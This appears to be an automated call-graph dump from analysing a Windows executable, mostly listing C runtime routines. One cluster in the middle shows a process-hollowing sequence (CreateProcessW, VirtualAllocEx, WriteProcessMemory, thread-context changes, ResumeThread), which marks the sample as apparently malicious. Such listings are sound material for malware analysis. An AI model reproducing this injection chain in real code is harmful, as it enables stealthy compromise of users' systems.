17404->17409 17405 2e4804 17411 2e461f 17405->17411 17407 2e4813 17424 2e4845 17407->17424 17409->17398 17410->17405 17412 2e462e 17411->17412 17413 2e4656 17411->17413 17414 2db601 _Fputc 29 API calls 17412->17414 17415 2e0efc _Fputc 29 API calls 17413->17415 17420 2e4649 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 17414->17420 17416 2e465f 17415->17416 17417 2e4051 33 API calls 17416->17417 17418 2e467d 17417->17418 17419 2e4709 17418->17419 17418->17420 17422 2e4720 17418->17422 17421 2e42a9 34 API calls 17419->17421 17420->17407 17421->17420 17422->17420 17423 2e4454 33 API calls 17422->17423 17423->17420 17427 2d8773 LeaveCriticalSection 17424->17427 17426 2e484d 17426->17409 17427->17426 16362 2d884f 16363 2dbbb9 ___scrt_uninitialize_crt 68 API calls 16362->16363 16364 2d8857 16363->16364 16372 2e0cde 16364->16372 16366 2d885c 16382 2e0d89 16366->16382 16369 2d8886 16370 2de4f7 ___free_lconv_mon 14 API calls 16369->16370 16371 2d8891 16370->16371 16373 2e0cea ___scrt_is_nonwritable_in_current_image 16372->16373 16386 2db750 EnterCriticalSection 16373->16386 16375 2e0d61 16391 2e0d80 16375->16391 16377 2e0cf5 16377->16375 16378 2e0d35 DeleteCriticalSection 16377->16378 16387 2dba11 16377->16387 16381 2de4f7 ___free_lconv_mon 14 API calls 16378->16381 16381->16377 16383 2d886b DeleteCriticalSection 16382->16383 16384 2e0da0 16382->16384 16383->16366 16383->16369 16384->16383 16385 2de4f7 ___free_lconv_mon 14 API calls 16384->16385 16385->16383 16386->16377 16388 2dba24 _Fputc 16387->16388 16394 2dbacf 16388->16394 16390 2dba30 _Fputc 16390->16377 16466 2db767 LeaveCriticalSection 16391->16466 16393 2e0d6d 16393->16366 16395 2dbadb ___scrt_is_nonwritable_in_current_image 16394->16395 16396 2dbb08 16395->16396 16397 2dbae5 16395->16397 16404 2dbb00 16396->16404 16405 2d875f EnterCriticalSection 16396->16405 16398 2db601 _Fputc 29 API calls 16397->16398 16398->16404 16400 2dbb26 16406 2dba41 16400->16406 16402 2dbb33 16420 2dbb5e 16402->16420 16404->16390 16405->16400 16407 2dba4e 16406->16407 16408 2dba71 16406->16408 16409 2db601 _Fputc 29 API calls 16407->16409 16410 2dbc27 ___scrt_uninitialize_crt 64 API calls 16408->16410 16418 2dba69 16408->16418 16409->16418 16411 2dba89 16410->16411 16412 2e0d89 14 API calls 16411->16412 16413 2dba91 16412->16413 16414 2e0efc _Fputc 29 API calls 16413->16414 16415 2dba9d 16414->16415 16423 2e4ff5 16415->16423 16418->16402 16419 2de4f7 ___free_lconv_mon 14 API calls 16419->16418 16465 2d8773 LeaveCriticalSection 16420->16465 16422 2dbb64 16422->16404 16424 2e501e 16423->16424 16429 2dbaa4 16423->16429 16425 2e506d 16424->16425 16427 2e5045 16424->16427 16426 2db601 _Fputc 29 API calls 16425->16426 16426->16429 16430 2e5098 16427->16430 16429->16418 16429->16419 16431 2e50a4 ___scrt_is_nonwritable_in_current_image 16430->16431 16438 2e4ef9 EnterCriticalSection 16431->16438 16433 2e50b2 16434 2e50e3 16433->16434 16439 2e4f55 16433->16439 16452 2e511d 16434->16452 16438->16433 16440 2e4cb0 _Fputc 29 API calls 16439->16440 16443 2e4f65 16440->16443 16441 2e4f6b 16455 2e4d1a 16441->16455 16443->16441 16444 2e4cb0 _Fputc 29 API calls 16443->16444 16451 2e4f9d 16443->16451 16447 2e4f94 16444->16447 16445 2e4cb0 _Fputc 29 API calls 16446 2e4fa9 CloseHandle 16445->16446 16446->16441 16448 2e4fb5 GetLastError 16446->16448 16449 2e4cb0 _Fputc 29 API calls 16447->16449 16448->16441 16449->16451 16450 2e4fc3 __fread_nolock 16450->16434 16451->16441 16451->16445 16464 2e4f1c LeaveCriticalSection 16452->16464 16454 2e5106 16454->16429 16456 2e4d90 16455->16456 16457 2e4d29 16455->16457 16458 2dad6d __strnicoll 14 API calls 16456->16458 16457->16456 16463 2e4d53 16457->16463 16459 2e4d95 16458->16459 16460 2dad80 __dosmaperr 14 API calls 16459->16460 16461 2e4d80 16460->16461 16461->16450 16462 2e4d7a SetStdHandle 16462->16461 16463->16461 16463->16462 16464->16454 16465->16422 16466->16393 17591 2d3fa3 17593 2d3fb9 _Yarn 17591->17593 17592 2d3fbf 17593->17592 17594 2d4065 17593->17594 17597 2dc32c 17593->17597 17594->17592 17596 2dc32c __fread_nolock 45 API calls 17594->17596 17596->17592 17600 2dc28f 17597->17600 17601 2dc29b ___scrt_is_nonwritable_in_current_image 17600->17601 17602 2dc2e5 17601->17602 17604 2dc2ae __fread_nolock 17601->17604 17612 2dc2d3 17601->17612 17613 2d875f EnterCriticalSection 17602->17613 17606 2dad6d __strnicoll 14 API calls 17604->17606 17605 2dc2ef 17614 2dc349 17605->17614 17608 2dc2c8 17606->17608 17610 2db458 __strnicoll 29 API calls 17608->17610 17610->17612 17612->17593 17613->17605 17615 2dc306 17614->17615 17618 2dc35b __fread_nolock 17614->17618 17628 2dc324 17615->17628 17616 2dc368 17617 2dad6d __strnicoll 14 API calls 17616->17617 17626 2dc36d 17617->17626 17618->17615 17618->17616 17620 2dc3b9 17618->17620 17619 2db458 __strnicoll 29 API calls 17619->17615 17620->17615 17621 2e5d52 __fread_nolock 43 API calls 17620->17621 17622 2dc4e4 __fread_nolock 17620->17622 17623 2dc20e __fread_nolock 29 API calls 17620->17623 17624 2e0efc _Fputc 29 API calls 17620->17624 17627 2e625d __fread_nolock 41 API calls 17620->17627 17621->17620 17625 2dad6d __strnicoll 14 API calls 17622->17625 17623->17620 17624->17620 17625->17626 17626->17619 17627->17620 17631 2d8773 LeaveCriticalSection 17628->17631 17630 2dc32a 17630->17612 17631->17630 16498 2d42bc 16499 2d42c8 16498->16499 16500 2d42ff 16499->16500 16504 2dcc2c 16499->16504 16502 2d42ec 16502->16500 16508 2d4362 16502->16508 16505 2dcc3f _Fputc 16504->16505 16512 2dcc99 16505->16512 16507 2dcc54 _Fputc 16507->16502 16509 2d4381 16508->16509 16511 2d43a3 16509->16511 16542 2d8719 16509->16542 16511->16500 16513 2dccab 16512->16513 16515 2dccce 16512->16515 16514 2db601 _Fputc 29 API calls 16513->16514 16516 2dccc6 16514->16516 16515->16513 16517 2dccf5 16515->16517 16516->16507 16520 2dcdcf 16517->16520 16521 2dcddb ___scrt_is_nonwritable_in_current_image 16520->16521 16528 2d875f EnterCriticalSection 16521->16528 16523 2dcde9 16529 2dcd2f 16523->16529 16525 2dcdf6 16538 2dce1e 16525->16538 16528->16523 16530 2dbc27 ___scrt_uninitialize_crt 64 API calls 16529->16530 16531 2dcd4a 16530->16531 16532 2e0d89 14 API calls 16531->16532 16533 2dcd54 16532->16533 16534 2df807 __strnicoll 14 API calls 16533->16534 16537 2dcd6f 16533->16537 16535 2dcd93 16534->16535 16536 2de4f7 ___free_lconv_mon 14 API calls 16535->16536 16536->16537 16537->16525 16541 2d8773 LeaveCriticalSection 16538->16541 16540 2dcd2d 16540->16507 16541->16540 16543 2d8725 16542->16543 16545 2d873a 16542->16545 16544 2dad6d __strnicoll 14 API calls 16543->16544 16546 2d872a 16544->16546 16545->16511 16547 2db458 __strnicoll 29 API calls 16546->16547 16548 2d8735 16547->16548 16548->16511 13293 2f519e 13297 2f51d4 13293->13297 13294 2f5321 GetPEB 13295 2f5333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 13294->13295 13296 2f53da WriteProcessMemory 13295->13296 13295->13297 13298 2f541f 13296->13298 13297->13294 13297->13295 13299 2f5424 WriteProcessMemory 13298->13299 13300 2f5461 WriteProcessMemory Wow64SetThreadContext ResumeThread 13298->13300 13299->13298 14234 2d57d0 14235 2d57dc ___scrt_is_nonwritable_in_current_image 14234->14235 14261 2d2baf 14235->14261 14237 2d57e3 14238 2d593c 14237->14238 14247 2d580d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 14237->14247 14297 2d5020 IsProcessorFeaturePresent 14238->14297 14240 2d5943 14241 2d5949 14240->14241 14301 2d8bd6 14240->14301 14304 2d8bec 14241->14304 14245 2d582c 14246 2d58ad 14279 2db145 14246->14279 14247->14245 14247->14246 14249 2d58a6 14247->14249 14272 2d8c20 14249->14272 14251 2d58b3 14283 2f804b 14251->14283 14256 2d58d8 14257 2d58e1 14256->14257 14288 2d8c02 14256->14288 14291 2d2be8 14257->14291 14262 2d2bb8 14261->14262 14307 2d4c8c IsProcessorFeaturePresent 14262->14307 14266 2d2bc9 14267 2d2bcd 14266->14267 14317 2d867a 14266->14317 14267->14237 14270 2d2be4 14270->14237 14273 2dcf0b ___scrt_is_nonwritable_in_current_image 14272->14273 14274 2d8c36 std::_Lockit::_Lockit 14272->14274 14275 2de783 _unexpected 39 API calls 14273->14275 14274->14246 14278 2dcf1c 14275->14278 14276 2db9c2 CallUnexpected 39 API calls 14277 2dcf46 14276->14277 14278->14276 14280 2db14e 14279->14280 14281 2db153 14279->14281 14389 2db26e 14280->14389 14281->14251 14945 2f8000 GetModuleHandleA GetModuleFileNameA ExitProcess 14283->14945 14286 2d4fcd GetModuleHandleW 14287 2d4fd9 14286->14287 14287->14240 14287->14256 14948 2d8d21 14288->14948 14292 2d2bf4 14291->14292 14296 2d2c0a 14292->14296 15019 2d868c 14292->15019 14294 2d2c02 14295 2d6188 ___scrt_uninitialize_crt 7 API calls 14294->14295 14295->14296 14296->14245 14298 2d5036 __fread_nolock CallUnexpected 14297->14298 14299 2d50e1 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14298->14299 14300 2d5125 CallUnexpected 14299->14300 14300->14240 14302 2d8d21 CallUnexpected 21 API calls 14301->14302 14303 2d8be7 14302->14303 14303->14241 14305 2d8d21 CallUnexpected 21 API calls 14304->14305 14306 2d5951 14305->14306 14308 2d2bc4 14307->14308 14309 2d6169 14308->14309 14326 2de1c6 14309->14326 14313 2d617a 14314 2d6185 14313->14314 14340 2de202 14313->14340 14314->14266 14316 2d6172 14316->14266 14380 2e0815 14317->14380 14320 2d6188 14321 2d619b 14320->14321 14322 2d6191 14320->14322 14321->14267 14323 2dd297 ___vcrt_uninitialize_ptd 6 API calls 14322->14323 14324 2d6196 14323->14324 14325 2de202 ___vcrt_uninitialize_locks DeleteCriticalSection 14324->14325 14325->14321 14327 2de1cf 14326->14327 14329 2de1f8 14327->14329 14331 2d616e 14327->14331 14344 2e7e4b 14327->14344 14330 2de202 ___vcrt_uninitialize_locks DeleteCriticalSection 14329->14330 14330->14331 14331->14316 14332 2dd264 14331->14332 14361 2e7d5c 14332->14361 14337 2dd294 14337->14313 14339 2dd279 14339->14313 14341 2de22c 14340->14341 14342 2de20d 14340->14342 14341->14316 14343 2de217 DeleteCriticalSection 14342->14343 14343->14341 14343->14343 14349 2e7edd 14344->14349 14347 2e7e83 InitializeCriticalSectionAndSpinCount 14348 2e7e6e 14347->14348 14348->14327 14350 2e7e65 14349->14350 14353 2e7efe 14349->14353 14350->14347 14350->14348 14351 2e7f66 GetProcAddress 14351->14350 14353->14350 14353->14351 14354 2e7f57 14353->14354 14356 2e7e92 LoadLibraryExW 14353->14356 14354->14351 14355 2e7f5f FreeLibrary 14354->14355 14355->14351 14357 2e7ed9 14356->14357 14358 2e7ea9 GetLastError 14356->14358 14357->14353 14358->14357 14359 2e7eb4 ___vcrt_FlsFree 14358->14359 14359->14357 14360 2e7eca LoadLibraryExW 14359->14360 14360->14353 14362 2e7edd ___vcrt_FlsFree 5 API calls 14361->14362 14363 2e7d76 14362->14363 14364 2e7d8f TlsAlloc 14363->14364 14365 2dd26e 14363->14365 14365->14339 14366 2e7e0d 14365->14366 14367 2e7edd ___vcrt_FlsFree 5 API calls 14366->14367 14368 2e7e27 14367->14368 14369 2e7e42 TlsSetValue 14368->14369 14370 2dd287 14368->14370 14369->14370 14370->14337 14371 2dd297 14370->14371 14372 2dd2a1 14371->14372 14374 2dd2a7 14371->14374 14375 2e7d97 14372->14375 14374->14339 14376 2e7edd ___vcrt_FlsFree 5 API calls 14375->14376 14377 2e7db1 14376->14377 14378 2e7dc9 TlsFree 14377->14378 14379 2e7dbd 14377->14379 14378->14379 14379->14374 14381 2e0825 14380->14381 14382 2d2bd6 14380->14382 14381->14382 14384 2dff89 14381->14384 14382->14270 14382->14320 14385 2dff90 14384->14385 14386 2dffd3 GetStdHandle 14385->14386 14387 2e0035 14385->14387 14388 2dffe6 GetFileType 14385->14388 14386->14385 14387->14381 14388->14385 14390 2db277 14389->14390 14393 2db28d 14389->14393 14390->14393 14395 2db1af 14390->14395 14392 2db284 14392->14393 14412 2db37c 14392->14412 14393->14281 14396 2db1b8 14395->14396 14397 2db1bb 14395->14397 14396->14392 14421 2e004c 14397->14421 14402 2db1cc 14405 2de4f7 ___free_lconv_mon 14 API calls 14402->14405 14403 2db1d8 14448 2db29a 14403->14448 14407 2db1d2 14405->14407 14407->14392 14408 2de4f7 ___free_lconv_mon 14 API calls 14409 2db1fc 14408->14409 14410 2de4f7 ___free_lconv_mon 14 API calls 14409->14410 14411 2db202 14410->14411 14411->14392 14413 2db3ed 14412->14413 14418 2db38b 14412->14418 14413->14393 14414 2de641 WideCharToMultiByte std::_Locinfo::_Locinfo_dtor 14414->14418 14415 2df807 __strnicoll 14 API calls 14415->14418 14416 2db3f1 14417 2de4f7 ___free_lconv_mon 14 API calls 14416->14417 14417->14413 14418->14413 14418->14414 14418->14415 14418->14416 14420 2de4f7 ___free_lconv_mon 14 API calls 14418->14420 14667 2e4926 14418->14667 14420->14418 14422 2e0055 14421->14422 14426 2db1c1 14421->14426 14470 2de83e 14422->14470 14427 2e484f GetEnvironmentStringsW 14426->14427 14428 2db1c6 14427->14428 14429 2e4867 14427->14429 14428->14402 14428->14403 14430 2de641 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 14429->14430 14431 2e4884 14430->14431 14432 2e488e FreeEnvironmentStringsW 14431->14432 14433 2e4899 14431->14433 14432->14428 14434 2de531 __strnicoll 15 API calls 14433->14434 14435 2e48a0 14434->14435 14436 2e48a8 14435->14436 14437 2e48b9 14435->14437 14438 2de4f7 ___free_lconv_mon 14 API calls 14436->14438 14439 2de641 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 14437->14439 14440 2e48ad FreeEnvironmentStringsW 14438->14440 14441 2e48c9 14439->14441 14440->14428 14442 2e48d8 14441->14442 14443 2e48d0 14441->14443 14445 2de4f7 ___free_lconv_mon 14 API calls 14442->14445 14444 2de4f7 ___free_lconv_mon 14 API calls 14443->14444 14446 2e48d6 FreeEnvironmentStringsW 14444->14446 14445->14446 14446->14428 14449 2db2af 14448->14449 14450 2df807 __strnicoll 14 API calls 14449->14450 14451 2db2d6 14450->14451 14452 2db2de 14451->14452 14458 2db2e8 14451->14458 14453 2de4f7 ___free_lconv_mon 14 API calls 14452->14453 14454 2db1df 14453->14454 14454->14408 14455 2db345 14456 2de4f7 ___free_lconv_mon 14 API calls 14455->14456 14456->14454 14457 2df807 __strnicoll 14 API calls 14457->14458 14458->14455 14458->14457 14459 2db354 14458->14459 14460 2de16c ___std_exception_copy 29 API calls 14458->14460 14464 2db36f 14458->14464 14466 2de4f7 ___free_lconv_mon 14 API calls 14458->14466 14661 2db23f 14459->14661 14460->14458 14463 2de4f7 ___free_lconv_mon 14 API calls 14465 2db361 14463->14465 14467 2db485 __Getctype 11 API calls 14464->14467 14468 2de4f7 ___free_lconv_mon 14 API calls 14465->14468 14466->14458 14469 2db37b 14467->14469 14468->14454 14471 2de849 14470->14471 14472 2de84f 14470->14472 14473 2df19b __strnicoll 6 API calls 14471->14473 14474 2df1da __strnicoll 6 API calls 14472->14474 14492 2de855 14472->14492 14473->14472 14475 2de869 14474->14475 14478 2df807 __strnicoll 14 API calls 14475->14478 14475->14492 14476 2db9c2 CallUnexpected 39 API calls 14480 2de8d3 14476->14480 14477 2de85a 14495 2e040d 14477->14495 14479 2de879 14478->14479 14481 2de896 14479->14481 14482 2de881 14479->14482 14484 2df1da __strnicoll 6 API calls 14481->14484 14483 2df1da __strnicoll 6 API calls 14482->14483 14485 2de88d 14483->14485 14486 2de8a2 14484->14486 14489 2de4f7 ___free_lconv_mon 14 API calls 14485->14489 14487 2de8b5 14486->14487 14488 2de8a6 14486->14488 14491 2dea94 __strnicoll 14 API calls 14487->14491 14490 2df1da __strnicoll 6 API calls 14488->14490 14489->14492 14490->14485 14493 2de8c0 14491->14493 14492->14476 14492->14477 14494 2de4f7 ___free_lconv_mon 14 API calls 14493->14494 14494->14477 14496 2e0437 14495->14496 14517 2e0299 14496->14517 14499 2de531 __strnicoll 15 API calls 14500 2e0461 14499->14500 14501 2e0469 14500->14501 14502 2e0477 14500->14502 14504 2de4f7 ___free_lconv_mon 14 API calls 14501->14504 14524 2e0094 14502->14524 14505 2e0450 14504->14505 14505->14426 14507 2e04af 14508 2dad6d __strnicoll 14 API calls 14507->14508 14509 2e04b4 14508->14509 14512 2de4f7 ___free_lconv_mon 14 API calls 14509->14512 14510 2e04f6 14511 2e053f 14510->14511 14535 2e07c8 14510->14535 14515 2de4f7 ___free_lconv_mon 14 API calls 14511->14515 14512->14505 14513 2e04ca 14513->14510 14516 2de4f7 ___free_lconv_mon 14 API calls 14513->14516 14515->14505 14516->14510 14543 2d7e1a 14517->14543 14520 2e02cc 14522 2e02e3 14520->14522 14523 2e02d1 GetACP 14520->14523 14521 2e02ba GetOEMCP 14521->14522 14522->14499 14522->14505 14523->14522 14525 2e0299 41 API calls 14524->14525 14526 2e00b4 14525->14526 14527 2e01b9 14526->14527 14529 2e00f1 IsValidCodePage 14526->14529 14534 2e010c __fread_nolock 14526->14534 14528 2d29c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 14527->14528 14530 2e0297 14528->14530 14529->14527 14531 2e0103 14529->14531 14530->14507 14530->14513 14532 2e012c GetCPInfo 14531->14532 14531->14534 14532->14527 14532->14534 14558 2e0623 14534->14558 14536 2e07d4 ___scrt_is_nonwritable_in_current_image 14535->14536 14635 2db750 EnterCriticalSection 14536->14635 14538 2e07de 14636 2e0562 14538->14636 14544 2d7e38 14543->14544 14545 2d7e31 14543->14545 14544->14545 14546 2de783 _unexpected 39 API calls 14544->14546 14545->14520 14545->14521 14547 2d7e59 14546->14547 14548 2ded66 __Getctype 39 API calls 14547->14548 14549 2d7e6f 14548->14549 14551 2ded93 14549->14551 14552 2dedbb 14551->14552 14553 2deda6 14551->14553 14552->14545 14553->14552 14555 2e0039 14553->14555 14556 2de783 _unexpected 39 API calls 14555->14556 14557 2e003e 14556->14557 14557->14552 14559 2e064b GetCPInfo 14558->14559 14560 2e0714 14558->14560 14559->14560 14561 2e0663 14559->14561 14562 2d29c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 14560->14562 14569 2dfaf3 14561->14569 14564 2e07c6 14562->14564 14564->14527 14568 2dfbf4 43 API calls 14568->14560 14570 2d7e1a __strnicoll 39 API calls 14569->14570 14571 2dfb13 14570->14571 14589 2de57f 14571->14589 14573 2dfbcf 14575 2d29c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 14573->14575 14574 2dfbc7 14592 2d54a7 14574->14592 14578 2dfbf2 14575->14578 14576 2dfb40 14576->14573 14576->14574 14577 2de531 __strnicoll 15 API calls 14576->14577 14580 2dfb65 __fread_nolock __alloca_probe_16 14576->14580 14577->14580 14584 2dfbf4 14578->14584 14580->14574 14581 2de57f __strnicoll MultiByteToWideChar 14580->14581 14582 2dfbae 14581->14582 14582->14574 14583 2dfbb5 GetStringTypeW 14582->14583 14583->14574 14585 2d7e1a __strnicoll 39 API calls 14584->14585 14586 2dfc07 14585->14586 14598 2dfc3d 14586->14598 14596 2de5a9 14589->14596 14593 2d54b1 14592->14593 14594 2d54c2 14592->14594 14593->14594 14595 2dc522 std::locale::_Locimp::~_Locimp 14 API calls 14593->14595 14594->14573 14595->14594 14597 2de59b MultiByteToWideChar 14596->14597 14597->14576 14599 2dfc58 __strnicoll 14598->14599 14600 2de57f __strnicoll MultiByteToWideChar 14599->14600 14603 2dfc9c 14600->14603 14601 2dfe17 14602 2d29c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 14601->14602 14604 2dfc28 14602->14604 14603->14601 14605 2de531 __strnicoll 15 API calls 14603->14605 14607 2dfcc2 __alloca_probe_16 14603->14607 14625 2dfd6a 14603->14625 14604->14568 14605->14607 14606 2d54a7 __freea 14 API calls 14606->14601 14608 2de57f __strnicoll MultiByteToWideChar 14607->14608 14607->14625 14609 2dfd0b 14608->14609 14609->14625 14626 2df31a 14609->14626 14612 2dfd79 14614 2dfe02 14612->14614 14615 2dfd8b __alloca_probe_16 14612->14615 14616 2de531 __strnicoll 15 API calls 14612->14616 14613 2dfd41 14618 2df31a std::_Locinfo::_Locinfo_dtor 6 API calls 14613->14618 14613->14625 14617 2d54a7 __freea 14 API calls 14614->14617 14615->14614 14619 2df31a std::_Locinfo::_Locinfo_dtor 6 API calls 14615->14619 14616->14615 14617->14625 14618->14625 14620 2dfdce 14619->14620 14620->14614 14632 2de641 14620->14632 14622 2dfde8 14622->14614 14623 2dfdf1 14622->14623 14624 2d54a7 __freea 14 API calls 14623->14624 14624->14625 14625->14606 14627 2df689 std::_Lockit::_Lockit 5 API calls 14626->14627 14628 2df325 14627->14628 14629 2df3b6 __strnicoll 5 API calls 14628->14629 14631 2df32b 14628->14631 14630 2df36b LCMapStringW 14629->14630 14630->14631 14631->14612 14631->14613 14631->14625 14634 2de654 std::_Locinfo::_Locinfo_dtor 14632->14634 14633 2de692 WideCharToMultiByte 14633->14622 14634->14633 14635->14538 14646 2dc20e 14636->14646 14638 2e0584 14639 2dc20e __fread_nolock 29 API calls 14638->14639 14640 2e05a3 14639->14640 14641 2e05ca 14640->14641 14642 2de4f7 ___free_lconv_mon 14 API calls 14640->14642 14643 2e0809 14641->14643 14642->14641 14660 2db767 LeaveCriticalSection 14643->14660 14645 2e07f7 14645->14511 14647 2dc21f 14646->14647 14656 2dc21b _Yarn 14646->14656 14648 2dc226 14647->14648 14651 2dc239 __fread_nolock 14647->14651 14649 2dad6d __strnicoll 14 API calls 14648->14649 14650 2dc22b 14649->14650 14652 2db458 __strnicoll 29 API calls 14650->14652 14653 2dc267 14651->14653 14654 2dc270 14651->14654 14651->14656 14652->14656 14655 2dad6d __strnicoll 14 API calls 14653->14655 14654->14656 14658 2dad6d __strnicoll 14 API calls 14654->14658 14657 2dc26c 14655->14657 14656->14638 14659 2db458 __strnicoll 29 API calls 14657->14659 14658->14657 14659->14656 14660->14645 14662 2db24c 14661->14662 14663 2db269 14661->14663 14664 2db263 14662->14664 14665 2de4f7 ___free_lconv_mon 14 API calls 14662->14665 14663->14463 14666 2de4f7 ___free_lconv_mon 14 API calls 14664->14666 14665->14662 14666->14663 14668 2e4931 14667->14668 14669 2e4942 14668->14669 14672 2e4955 ___from_strstr_to_strchr 14668->14672 14670 2dad6d __strnicoll 14 API calls 14669->14670 14680 2e4947 14670->14680 14671 2e4b6c 14674 2dad6d __strnicoll 14 API calls 14671->14674 14672->14671 14673 2e4975 14672->14673 14730 2e4b91 14673->14730 14676 2e4b71 14674->14676 14678 2de4f7 ___free_lconv_mon 14 API calls 14676->14678 14678->14680 14679 2e49b9 14716 2e49a5 14679->14716 14734 2e4bab 14679->14734 14680->14418 14681 2e49bb 14685 2df807 __strnicoll 14 API calls 14681->14685 14681->14716 14683 2e4997 14690 2e49b4 14683->14690 14691 2e49a0 14683->14691 14687 2e49c9 14685->14687 14686 2de4f7 ___free_lconv_mon 14 API calls 14686->14680 14689 2de4f7 ___free_lconv_mon 14 API calls 14687->14689 14688 2e4a2e 14693 2de4f7 ___free_lconv_mon 14 API calls 14688->14693 14694 2e49d4 14689->14694 14692 2e4b91 39 API calls 14690->14692 14695 2dad6d __strnicoll 14 API calls 14691->14695 14692->14679 14701 2e4a36 14693->14701 14694->14679 14699 2df807 __strnicoll 14 API calls 14694->14699 14694->14716 14695->14716 14696 2e4a79 14697 2e3f46 std::ios_base::_Init 32 API calls 14696->14697 14696->14716 14698 2e4aa7 14697->14698 14700 2de4f7 ___free_lconv_mon 14 API calls 14698->14700 14703 2e49f0 14699->14703 14706 2e4a63 14700->14706 14701->14706 14738 2e3f46 14701->14738 14702 2e4b61 14704 2de4f7 ___free_lconv_mon 14 API calls 14702->14704 14707 2de4f7 ___free_lconv_mon 14 API calls 14703->14707 14704->14680 14706->14702 14706->14706 14709 2df807 __strnicoll 14 API calls 14706->14709 14706->14716 14707->14679 14708 2e4a5a 14710 2de4f7 ___free_lconv_mon 14 API calls 14708->14710 14711 2e4af2 14709->14711 14710->14706 14712 2e4afa 14711->14712 14713 2e4b02 14711->14713 14714 2de4f7 ___free_lconv_mon 14 API calls 14712->14714 14715 2de16c ___std_exception_copy 29 API calls 14713->14715 14714->14716 14717 2e4b0e 14715->14717 14716->14686 14718 2e4b86 14717->14718 14719 2e4b15 14717->14719 14720 2db485 __Getctype 11 API calls 14718->14720 14747 2e9a5c 14719->14747 14722 2e4b90 14720->14722 14724 2e4b3c 14727 2dad6d __strnicoll 14 API calls 14724->14727 14725 2e4b5b 14726 2de4f7 ___free_lconv_mon 14 API calls 14725->14726 14726->14702 14728 2e4b41 14727->14728 14729 2de4f7 ___free_lconv_mon 14 API calls 14728->14729 14729->14716 14731 2e4b9e 14730->14731 14733 2e4980 14730->14733 14762 2e4c00 14731->14762 14733->14679 14733->14681 14733->14683 14735 2e4bc1 14734->14735 14737 2e4a1e 14734->14737 14735->14737 14777 2e996b 14735->14777 14737->14688 14737->14696 14739 2e3f53 14738->14739 14741 2e3f6e 14738->14741 14740 2e3f5f 14739->14740 14739->14741 14743 2dad6d __strnicoll 14 API calls 14740->14743 14742 2e3f7d 14741->14742 14877 2e9604 14741->14877 14884 2e757c 14742->14884 14746 2e3f64 __fread_nolock 14743->14746 14746->14708 14896 2df7c8 14747->14896 14752 2e9acf 14755 2de4f7 ___free_lconv_mon 14 API calls 14752->14755 14757 2e9adb 14752->14757 14753 2df7c8 39 API calls 14754 2e9aac 14753->14754 14758 2d7f14 17 API calls 14754->14758 14755->14757 14756 2e4b36 14756->14724 14756->14725 14757->14756 14759 2de4f7 ___free_lconv_mon 14 API calls 14757->14759 14760 2e9ab9 14758->14760 14759->14756 14760->14752 14761 2e9ac3 SetEnvironmentVariableW 14760->14761 14761->14752 14763 2e4c13 14762->14763 14769 2e4c0e 14762->14769 14764 2df807 __strnicoll 14 API calls 14763->14764 14774 2e4c30 14764->14774 14765 2e4c9e 14766 2db9c2 CallUnexpected 39 API calls 14765->14766 14768 2e4ca3 14766->14768 14767 2de4f7 ___free_lconv_mon 14 API calls 14767->14769 14770 2db485 __Getctype 11 API calls 14768->14770 14769->14733 14771 2e4caf 14770->14771 14772 2df807 __strnicoll 14 API calls 14772->14774 14773 2de4f7 ___free_lconv_mon 14 API calls 14773->14774 14774->14765 14774->14768 14774->14772 14774->14773 14775 2de16c ___std_exception_copy 29 API calls 14774->14775 14776 2e4c8d 14774->14776 14775->14774 14776->14767 14778 2e997f 14777->14778 14779 2e9979 14777->14779 14795 2e9994 14778->14795 14781 2ea0fb 14779->14781 14782 2ea0b3 14779->14782 14815 2ea111 14781->14815 14784 2ea0b9 14782->14784 14787 2ea0d6 14782->14787 14786 2dad6d __strnicoll 14 API calls 14784->14786 14789 2ea0be 14786->14789 14791 2dad6d __strnicoll 14 API calls 14787->14791 14794 2ea0f4 14787->14794 14788 2ea0c9 14788->14735 14790 2db458 __strnicoll 29 API calls 14789->14790 14790->14788 14792 2ea0e5 14791->14792 14793 2db458 __strnicoll 29 API calls 14792->14793 14793->14788 14794->14735 14796 2d7e1a __strnicoll 39 API calls 14795->14796 14797 2e99aa 14796->14797 14798 2e998f 14797->14798 14799 2e99c6 14797->14799 14800 2e99dd 14797->14800 14798->14735 14801 2dad6d __strnicoll 14 API calls 14799->14801 14802 2e99f8 14800->14802 14803 2e99e6 14800->14803 14804 2e99cb 14801->14804 14806 2e9a18 14802->14806 14807 2e9a05 14802->14807 14805 2dad6d __strnicoll 14 API calls 14803->14805 14808 2db458 __strnicoll 29 API calls 14804->14808 14809 2e99eb 14805->14809 14833 2ea1dc 14806->14833 14810 2ea111 __strnicoll 39 API calls 14807->14810 14808->14798 14812 2db458 __strnicoll 29 API calls 14809->14812 14810->14798 14812->14798 14814 2dad6d __strnicoll 14 API calls 14814->14798 14816 2ea13b 14815->14816 14817 2ea121 14815->14817 14818 2ea15a 14816->14818 14819 2ea143 14816->14819 14820 2dad6d __strnicoll 14 API calls 14817->14820 14823 2ea166 14818->14823 14824 2ea17d 14818->14824 14822 2dad6d __strnicoll 14 API calls 14819->14822 14821 2ea126 14820->14821 14825 2db458 __strnicoll 29 API calls 14821->14825 14826 2ea148 14822->14826 14827 2dad6d __strnicoll 14 API calls 14823->14827 14828 2d7e1a __strnicoll 39 API calls 14824->14828 14831 2ea131 14824->14831 14825->14831 14829 2db458 __strnicoll 29 API calls 14826->14829 14830 2ea16b 14827->14830 14828->14831 14829->14831 14832 2db458 __strnicoll 29 API calls 14830->14832 14831->14788 14832->14831 14834 2d7e1a __strnicoll 39 API calls 14833->14834 14835 2ea1ef 14834->14835 14838 2ea222 14835->14838 14840 2ea256 __strnicoll 14838->14840 14839 2d29c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 14841 2e9a2e 14839->14841 14842 2ea4ba 14840->14842 14844 2ea2c3 GetCPInfo 14840->14844 14845 2ea2d6 14840->14845 14850 2ea2da 14840->14850 14841->14798 14841->14814 